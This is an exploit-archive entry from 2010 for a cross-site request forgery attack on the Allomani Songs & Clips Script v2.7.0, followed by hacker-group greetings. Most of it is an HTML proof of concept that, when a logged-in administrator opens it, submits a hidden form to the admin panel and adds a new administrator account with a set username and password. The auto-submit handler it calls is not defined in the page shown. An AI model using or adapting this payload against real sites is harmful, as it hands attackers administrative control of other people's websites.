id: 12938
date: 06/25/2010
title: Allomani Songs & Clips Script v2.7.0 - [CSRF] Add Admin Account
author: G0D-F4Th3r
cves: 

===============================================================
Allomani Songs & Clips Script v2.7.0 - [CSRF] Add Admin Account
===============================================================


# Exploit Title: Allomani & Clips v2.7.0 - [CSRF] Add Admin Account
# Date:25 -06-2010
# Author: G0D-F4Th3rG0D-F4Th3r
# Software Link: http://allomani.com
 
 
####################################################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://www.site.com/[path]/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="username" value="admin2"/>
<input type="hidden" name="password" value="admin2123"/>
<input type="hidden" name="email" value="test@test.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="?????"/>
</form>
</body>
</html>
 
#########################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
#########################################################################



#  0day.today [2023-03-25]  #